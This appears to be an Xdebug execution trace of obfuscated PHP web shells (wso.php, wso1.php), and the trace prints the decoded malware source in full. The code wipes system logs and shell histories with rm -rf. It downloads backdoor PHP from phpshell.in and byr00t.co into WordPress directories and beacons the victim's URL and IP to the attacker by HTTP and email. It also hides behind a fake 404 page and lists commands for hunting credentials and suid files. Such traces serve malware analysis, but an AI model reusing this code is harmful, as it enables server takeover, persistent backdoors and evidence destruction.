@system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf 
/var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = 
\'[base64-encoded payload removed]\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . 
$_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso1.php(4) : eval()'d code	1	0
4	13	0	0.007864	1143752	base64_decode	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.007884	1143840
4	13	R			'http://byr00t.co/l-'
4	14	0	0.007900	1143808	GetIP	1		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.007915	1143808	getenv	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.007932	1143840
5	15	R			FALSE
5	16	0	0.007946	1143808	getenv	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.007961	1143840
5	16	R			FALSE
5	17	0	0.007975	1143808	getenv	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.007990	1143880
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008017	1143848
4	14	R			'127.0.0.1'
4	18	0	0.008032	1143872	base64_encode	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso1.php'
4	18	1	0.008047	1143984
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4	19	0	0.008080	1143864	function_exists	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008095	1143904
4	19	R			TRUE
4	20	0	0.008109	1143864	curl_init	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008128	1144776
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008157	1144776	curl_setopt	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4	21	1	0.008177	1144872
4	21	R			TRUE
4	22	0	0.008190	1144776	curl_setopt	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008207	1144872
4	22	R			TRUE
4	23	0	0.008219	1144776	curl_exec	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.052340	1144808
4	23	R			''
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.052401	1144776	curl_close	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.052465	1143920
4	24	R			NULL
4	25	0	0.052509	1143888	file_get_contents	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4	25	1	0.655516	1147584
4	25	R			''
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.655809	1147544	define	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso1.php(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.655828	1147648
4	26	R			TRUE
4	27	0	0.655843	1147576	strpos	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.655859	1147648
4	27	R			FALSE
4	28	0	0.655883	1147576	session_start	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.655952	1148328
4	28	R			TRUE
4	29	0	0.655968	1148328	error_reporting	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.655983	1148368
4	29	R			0
4	30	0	0.655996	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.656013	1148400
4	30	R			''
4	31	0	0.656026	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.656041	1148400
4	31	R			''
4	32	0	0.656054	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	0.656068	1148400
4	32	R			'1'
4	33	0	0.656081	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.656097	1148432
4	33	R			'30'
4	34	0	0.656111	1148328	set_time_limit	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.656125	1148392
4	34	R			FALSE
3	12	1	0.656148	1149824
2	7	1	0.656165	1062800
1	3	1	0.656173	1061224
1	35	0	0.656181	1061256	Error->__toString	0		Unknown	0	0
2	36	0	0.656193	1061336	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.656205	1061592
2	36	R			'#0 /var/www/html/uploads/wso1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php(4): eval()\n#2 {main}'
1	35	1	0.656226	1065728
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php(4): eval()\n#2 {main}'
			0.656279	986224
TRACE END   [2023-02-12 22:48:00.093230]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249972.0487.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:59:57.946581]
1	0	1	0.000179	393512
1	3	0	0.000410	426920	{main}	1		/var/www/html/uploads/wso.php	0	0
1		A						/var/www/html/uploads/wso.php	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso.php	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000492	426920	base64_decode	0		/var/www/html/uploads/wso.php	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000513	427080
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000535	427048	gzinflate	0		/var/www/html/uploads/wso.php	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000559	427176
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000576	427016	htmlspecialchars_decode	0		/var/www/html/uploads/wso.php	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000593	427048
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000624	428576	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso.php	4	0
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.005696	1143752	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? 
array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . 
-type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo 
\'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover 